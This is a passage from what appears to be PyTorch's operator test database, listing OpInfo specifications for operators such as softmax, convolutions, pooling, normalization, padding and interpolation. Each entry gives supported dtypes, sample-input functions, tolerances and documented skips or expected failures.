DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), # PyTorch's heaviside does not appear to propagate NaNs DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values'), )), BinaryUfuncInfo('lcm', ref=np.lcm, dtypes=integral_types_and(), supports_autograd=False, supports_rhs_python_scalar=False), BinaryUfuncInfo('gcd', ref=np.gcd, dtypes=integral_types_and(), supports_autograd=False, supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.int8,)),)), BinaryUfuncInfo('isclose', ref=np.isclose, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_isclose, supports_autograd=False, supports_out=False, supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_numpy_refs', dtypes=(torch.complex128,)), # RuntimeError: Short did not match Int DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values'), # Problem due to internal inplace operations DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), )), # `softmax` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. # https://github.com/pytorch/pytorch/issues/68752 OpInfo('softmax', aliases=('special.softmax', 'nn.functional.softmax',), aten_name='softmax', aten_backward_name='_softmax_backward_data', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, assert_jit_shape_analysis=True, assert_autodiffed=True, supports_forward_ad=True, supports_out=True), OpInfo('softmax', aliases=('special.softmax', 'nn.functional.softmax',), variant_test_name="with_dtype", aten_name='softmax', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), assert_autodiffed=True, supports_forward_ad=True, supports_out=True), # `softmin` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. 
# https://github.com/pytorch/pytorch/issues/68752 OpInfo('nn.functional.softmin', aten_name='softmin', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, assert_jit_shape_analysis=False, assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo('nn.functional.softmin', variant_test_name="with_dtype", aten_name='softmin', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo( "nn.functional.cross_entropy", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_cross_entropy, supports_out=False, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-5, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", device_type="cpu", ), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 1536 # test_ops.TestJitCUDA.test_variant_consistency_jit_nn_functional_cross_entropy_cuda_float32 leaked # 1536 bytes CUDA memory on device 0 DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ) ), OpInfo('nn.functional.normalize', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_normalize, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('aminmax', ref=lambda x, dim=None, keepdim=False: (np.amin(x, axis=dim, keepdims=keepdim), np.amax(x, axis=dim, keepdims=keepdim)), dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool, torch.float16, torch.bfloat16), decorators=(onlyNativeDeviceTypes,), supports_autograd=False, sample_inputs_func=sample_inputs_aminmax, error_inputs_func=error_inputs_aminmax_amax_amin, skips=( # AssertionError: Resizing an out= argument with no elements threw a resize warning! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo('as_strided', op=lambda x, size, stride, storage_offset=0: torch.as_strided(x, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided, skips=( # Note: This xfail is fine -- it's inherent to how as_strided works DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples'), # AssertionError: False is not true : Scalars failed to compare as equal! 
DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: This operator is not Composite Compliant DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_forward_ad'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_complex_half_reference_testing'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Numerous errors"), 'TestGradients'))), OpInfo('as_strided_scatter', op=lambda x, src, size, stride, storage_offset=0: torch.as_strided_scatter(x, src, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided_scatter, skips=( DecorateInfo(unittest.skip('Works only for CPU complex64'), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip('Works for float64, fails for everything else'), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip('Works for int64, fails for everything else'), 'TestCommon', 'test_noncontiguous_samples'), # noqa: B950 DecorateInfo(unittest.skip('Fails in most cases, passes on LAZY for some reason'), 'TestCommon', 'test_variant_consistency_eager'), # noqa: B950 DecorateInfo(unittest.skip('Only fails for LAZY, passes on everything else'), 'TestCompositeCompliance', 'test_backward'), # noqa: B950 DecorateInfo(unittest.skip('Passes on complex64 and float32 only'), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Fails on cuda + rocm'), 'TestCommon', 'test_complex_half_reference_testing'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip('Passes on complex128 and float64 only'), 'TestGradients', 'test_fn_fwgrad_bwgrad'),)), OpInfo('nn.functional.cosine_similarity', aten_name="cosine_similarity", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cosine_similarity), OpInfo('nn.functional.adaptive_avg_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool1d), OpInfo('nn.functional.adaptive_avg_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. 
: # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool2d), OpInfo('nn.functional.adaptive_avg_pool3d', dtypes=floating_types_and(torch.half), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. : # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool3d(i0, (None, None, None)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool3d), OpInfo('nn.functional.adaptive_max_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool1d), OpInfo('nn.functional.adaptive_max_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. : # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_max_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool2d), OpInfo('nn.functional.adaptive_max_pool3d', dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. 
: # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_max_pool3d(i0, (None, None, None)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool3d), OpInfo('nn.functional.avg_pool1d', aten_name='avg_pool1d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool1d), OpInfo('nn.functional.avg_pool3d', aten_name='avg_pool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool3d, skips=( # AssertionError: Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo( "nn.functional.binary_cross_entropy_with_logits", aten_name="binary_cross_entropy_with_logits", supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_binary_cross_entropy_with_logits, skips=( DecorateInfo( unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,) ), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_gradgrad", dtypes=(torch.float64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.float64,)), ), ), UnaryUfuncInfo( 'nn.functional.relu', aten_name="relu", ref=lambda a: np.where(a <= 0, 0, a), supports_autograd=True, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_nn_activation_relu, supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('nn.functional.conv_transpose1d', aten_name='conv_transpose1d', aliases=('conv_transpose1d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose2d', aten_name='conv_transpose2d', aliases=('conv_transpose2d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose2d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose3d', aten_name='conv_transpose3d', aliases=('conv_transpose3d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose3d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped! 75029"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), DecorateInfo(unittest.skip("Skipped! 75363"), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped! RuntimeError: bias tensor has to be contiguous"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cuda', active_if=(not TEST_CUDNN)), ), supports_out=False,), OpInfo('nn.functional.conv1d', aliases=('conv1d',), aten_name='conv1d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCommon', 'test_complex_half_reference_testing' ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-3, rtol=1e-3)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. 
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/75309 # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.conv2d', aliases=('conv2d',), aten_name='conv2d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=partial(sample_inputs_conv2d), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=6e-2, rtol=5e-2)}), 'TestCommon', 'test_complex_half_reference_testing', ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. DecorateInfo(unittest.skip("Works on some configs!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.group_norm', aten_name='group_norm', aliases=('group_norm',), ref=reference_group_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)) ], sample_inputs_func=sample_inputs_group_norm, supports_expanded_weight=True,), OpInfo('nn.functional.instance_norm', # no ref because instance_norm will often have numerical instability (large numbers or nan) dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. 
# Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=TEST_WITH_ROCM) ], sample_inputs_func=sample_inputs_instance_norm, supports_expanded_weight=True,), OpInfo('nn.functional.layer_norm', aten_name='layer_norm', aten_backward_name='layer_norm_backward', aliases=('layer_norm',), ref=reference_layer_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1e-03)}), 'TestCommon', 'test_numpy_refs' ) ], sample_inputs_func=sample_inputs_layer_norm, supports_expanded_weight=True,), OpInfo('nn.functional.local_response_norm', dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_local_response_norm,), OpInfo('nn.functional.pad', variant_test_name='constant', aten_name='constant_pad_nd', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='constant'), supports_out=False), OpInfo('nn.functional.pad', variant_test_name='reflect', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='reflect'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='replicate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='replicate'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. 
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='circular', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='circular'), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), supports_out=False), OpInfo('nn.functional.hardswish', aten_name="hardswish", aten_backward_name='hardswish_backward', supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_hardswish, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, autodiff_nonfusible_nodes=["aten::hardswish"]), OpInfo('nn.functional.unfold', aten_name='im2col', aten_backward_name='im2col_backward', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=sample_inputs_nn_unfold, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # NOTE: this failure may not reproduce consistently on different systems # false INTERNAL ASSERT FAILED at "...torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185 DecorateInfo(unittest.skip("Internal assert failed!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='nearest', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), sample_inputs_func=partial(sample_inputs_interpolate, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='linear', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'linear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bilinear', supports_fwgrad_bwgrad=True, supports_autograd=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bicubic', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'bicubic'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='trilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'trilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='area', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_interpolate, 'area'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.upsample_bilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, 